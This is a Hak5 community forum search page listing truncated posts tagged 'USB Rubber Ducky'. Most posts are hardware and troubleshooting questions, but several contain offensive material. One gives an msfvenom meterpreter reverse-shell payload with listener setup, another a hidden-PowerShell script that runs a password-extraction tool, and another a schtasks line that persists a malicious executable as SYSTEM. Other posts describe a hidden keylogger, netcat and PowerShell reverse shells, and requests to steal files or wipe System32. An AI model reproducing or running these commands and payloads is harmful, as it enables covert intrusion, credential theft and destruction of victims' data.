Jump to content

Search the Community

Showing results for tags 'USB Rubber Ducky'.

  • Search By Tags

    Type tags separated by commas.
  • Search By Author

Content Type


  • Talk
    • Everything Else
    • Gaming
    • Questions
    • Business and Enterprise IT
    • Security
    • Hacks & Mods
    • Applications & Coding
    • Trading Post
  • Hak5 Gear
    • Hak5 Cloud C²
    • WiFi Pineapple Mark VII
    • USB Rubber Ducky
    • Bash Bunny
    • Key Croc
    • Packet Squirrel
    • Shark Jack
    • Signal Owl
    • LAN Turtle
    • Screen Crab
    • Plunder Bug
  • O.MG (Mischief Gadgets)
    • O.MG Cable
    • O.MG DemonSeed EDU
  • WiFi Pineapple (previous generations)
    • WiFi Pineapple TETRA
    • WiFi Pineapple NANO
    • WiFi Pineapple Mark V
    • WiFi Pineapple Mark IV
    • Pineapple Modules
    • WiFi Pineapples Mark I, II, III
  • Hak5 Shows
  • Community
    • Forums and Wiki
    • #Hak5
  • Projects
    • SDR - Software Defined Radio
    • Community Projects
    • Interceptor
    • USB Hacks
    • USB Multipass
    • Pandora Timeshifting

Find results in...

Find results that contain...

Date Created

  • Start


Last Updated

  • Start


Filter by number of...


  • Start





Website URL







Enter a five letter word.

  1. So this is a usb rubber ducky attacking in roughly .9 to 2.3 seconds NOTE: THIS REQUIRES PORT FORWARDING ( to use your ip address public ip) ports that need to be port forwarded 8888 & 8080 Heres the setup proc: (I use parrot sec os) Create the payload cd ~ msfvenom -p windows/meterpreter/reverse_tcp LHOST=<your public ip> LPORT=8888 -f exe > exploit.exe Start the PHP server sudo php -S -t ~ Start your listener msfconsole use exploit/multi/handler set PAYLOAD windows/meterpreter/reverse_tcp set LHOST <your public ip> set
  2. Do university networks running Windows 10 prevent USB Rubber Ducky password theft?
  3. Hello friends! Today I am going to show you a very simple 11 line USB Rubber Ducky Keylogger hack using powershell! Super simple. What this does is it starts a powershell as a hidden window, so the actual application will not be visible on the taskbar. Only through the Task Manager. Then it downloads a simple script from github into memory, then executes the keylogger command. The second to last line, after "-LogPath" input the location you want it to place the keylog file. And the "-Timeout" command is how many minutes you want to command to run. Here is the code: DELAY 500
  4. I am quite new to the world of hacking, and recently I have invested in the lan-turtle, and I was wondering what everyone's suggestions were on what Hak5 tool I should invest in next? '
  5. I'm selling my collection to fund a camera lens. To be frank, I simply do not have the time to play with these anymore. WiFi Pineapple Nano WiFi Pineapple IV Bash Bunny USB Rubber Ducky Throwing Star LAN Tap Kit Tactical Bag Selection of Antennas Cable Bag + connectorsComplete Kit Aluminium Carry Case Pineapple Juice Battery Pack ALFA usb network card J Link usb Network Card 8gb micro sd card I am based in the UK. I'm looking for sensible offers. I'm affraid this i
  6. Hello everyone, my name is Luca I am new to the forum, I am writing for the first time to ask for help, I am not an expert in programming language and I would like to simplify the palyloads that I modified starting from that of hak5. I followed the instructions below, and everything works correctly: https://www.hak5.org/blog/main-blog/stealing-files-with-the-usb-rubber-ducky-usb-exfiltration-explained - I used ducky-flasher, I chose the original "Twin Duck" firmware. - Inside the micro sd I created the folder "slurp", the files "d.cmd e.cmd i.vbs", and the file "inject.bi
  7. When I write a letter with accent mark in spanish does not mark the letter or the accent when I conect the USB Rubber Ducky to the pc Cuando escribo una letra con acento no me marca la letra ni el acento a la hora de conectar la USB Rubber Ducky al pc
  8. I have purchased about 80% of your equipment, Pineapple Mark V, Nano tactical, bash bunny, pocket squirrel, lan turtle, usb rubber ducky, router, wifi dongles, etc. Unfortunately I purchased them separately as they came out. Therefore I don't have a custom Hak5 case to keep them in. I wish you would consider selling the cases separately. I would be your first customer to buy one. Love your products, and the show.
  9. Hi guys, I just bought the rubber ducky and flashed it to the Twin Duck mode. Well the twin duck mode is working pretty much cool infact iam able to browse through files in my SD card and the one which comes with the ducky is also executing a Hello World Payload but when I make my own payload and put the inject.bin file the ducky doesnt show up rather it just show a red light for about a second and then theres no light neither the payload works. Ive tried to swap SD cards but that does'nt solve my problem either?
  10. I successfully implemented the root payload on Mac and PC I have a linux box waiting that connected successfully as root on both devices My question is, how do I handle multiple machines? Give each one a different port? That seems obnoxious to have to port forward each one so I know that isnt right Is there a "session manager" or a way for a webserver to catch those connection requests?
  11. Hello! I recently ordered a USB Rubber Ducky, and still a noob at it. I was wondering if one of you guys would be kind enough to make it do something, if it's possible. I want it, after it's plugged, to immediately start backing up the windows 10 and then after that it sends saves it online, or I heard about "TwinDuck" which can make it save it on there, which is better... So after it saves a backup on the Ducky, I want it to completely destroy the PC, maybe by erasing "System32" I am not sure I just want it to mess it up and delete everything. All while the backup is still on the rubber ducky
  12. Hi, I was looking at the USB Rubber Ducky and I noticed it had the optional decal. Is anyone able to tell me the dimensions for the USB decal because I wanted to custom print one with another logo. Thanks, CookieCoder
  13. I found this script that is actualy working very well. It is running .exe from SD instead of download and execute. Now, I am running webbrowserpassview.exe and it extracts the passwords on the screen. I want to save it as .txt , download it on twinduck (SD) and close the window on desktop, so I leave no trace. Does anyone knows how to continue the script bellow to proceed this action? REM RunEXE From TwinDuck SD By rickblack28 DELAY 5000 GUI r DELAY 100 STRING powershell -windowstyle hidden ; Start-Process "D:\hello.exe" ; Start-Process "E:\hello.exe" ; Start-Process "F:\hello.exe" ;
  14. How can I use a keyboard combo with three keys such as "GUI+ALT+F" Everytime I try using combos with more than two keys I get errors.
  15. I would just like to preface by saying that I won't be here to read or respond to comments. I apologize for that, but I am spending as much time as I can focusing on research and learning everything I can. This is a time I would consider to be my intellectual prime and I really want to use this time as best I can in that regard, so I hope you can understand why I won't be actively engaging as a user in general. https://medium.com/@ViGrey/phishing-for-root-using-shell-functions-against-mac-and-linux-2b1b7edbb9a9 This is a script that pretends to be sudo and /usr/bin/sudo, acts like
  16. Hey, i just found a method to start your malicious msf/or whatever payload as SYSTEM user from boot. This little shell line (shell needs to be run as administrator): schtasks /create /tn "Windows Help Service" /tr C:\maliciousfile.exe /sc onstart /ru SYSTEM /F creates a Task named "Windows Help Service" which runs C:\maliciousfile.exe every startup as SYSTEM user. Keep in mind that when using this as a payload you may need to escape the / and \ and ".I'm currently working on a C++ Version of PSExec (Source) to get rid of the .Net Framework. Feel free to post your Pay
  17. Hello All, I have been in and out of the scene for years and I needed to hack into a few devices for work recently. Anyway with my interest reinvigorated I was wanting to know what would be a good starting point to purchase one of these devices. I'm up in the air on this as I will probably end up with another one once I purchase a field kit. I'm leaning toward the USB Rubber Ducky or the LAN Turtle as cash is a bit tight right now. On the flip side of this though is if I get the Wifi Pineapple Nano I will not end up with a double device if I get the Elite Field Kit as that comes with
  18. I had some serious issues trying to change the firmware on my ducky attempting to use ducky flasher with multiple versions of linux. I ultimately ended up using a windows based machine to make it work. My ducky is working pretty well except when I write payloads to test anything, because the ducky is setup in twin mode, it will open a window showing all the files on the sd card while executing the payload. Any thoughts or ideas of how to prevent this? It is extremely obvious that the ducky had been plugged in. Not very covert.
  19. Hello, In the recent episodes Darren showed how to use the USB rubber duck to exfiltrate specified files from a victims computer when they are logged in. I am wondering if there is any way of doing this when no one is logged in? and the computer is at the login screen. thanks!
  20. Hello, My code is this WINDOWS r Delay 200 notepad.exe ENTER. When i plug it in to my windows 10 pc it acts as if im pressing crtl alt delete. Im not sure why. Any one know anything.
  21. Reverse TCP Shell using Powershell Only Hi Guys. I was having problems getting a payload for the ducky that wasn't detected by Kaspersky, AVG etc. So I started to look into the possibility of using Powershell only to create a reverse TCP shell. I found some promising base code on a Powershell site and made some additions/adaptations for connection resilience and error handling. Now, the nice thing about this PS script is that it's compatible with a netcat listener! Should be very easy to utilize this via a ducky script on my 'WiDucky'. (Wifi enabled ducky - https://github.com/bas
  22. In Hak5's blog post about stealing files with the USB Rubber Ducky, they only targeted the documents folder on the C: drive. I'm looking to steal all .PDFs/Excel spreadsheet, regardless of their directory/drive. Can anyone show me how this is done? I have been trying all day now, but can't get a satisfactory result. Thanks in advance! Any help would be greatly appreciated.
  23. How to Make USB Rubber Ducky Scripts When Drive Letter is Unknown. Ever wanted to make script that could get a file from the USB Rubber Ducky SD card. If you have you probably have run into the problem that, every time you plug the USB Rubber Ducky into a different computer, it most likely has a different drive letter then the last computer you plugged it into. Which means you would have to go back and change the drive letter in the script. If you are having problems with this then your on the right page! What I am going to hopefully teach you in this page is how to overcoming this pro
  24. Hello, I have been trying to make some payloads for my USB Rubber Ducky, but have run into some problems. When making my payloads sometimes I might open a file from the duck itself (I have the twin duck firmware installed). After using the payload on my personal computer I went and tryed it on an old Win7 computer of mine. But relised when plugging in that the drive letter had changed from the drive letter that was on my personal computer, which I have scripted it on. As I would not like to change the payload each time I plug it in to a diiferent computer, is there some type of special path th
  25. Hello everyone Dtpk here and well I did a thing using Netcat and the usb rubber ducky to make a invisible reverse shell in under a few seconds I didn't time it this time but if I had to guess its about 8 to 9 seconds maybe a little faster first it navigates to userprofile folder then it downloads unzip.exe from either you own drop box or mine if you chose not to change the code then it downloads netcat from its site extracts it from command line using unzip.exe then it makes a batch file to invoke netcat to open a port on 190 then we use vbs script to launch the batch file invisibly. Also I ha
  • Create New...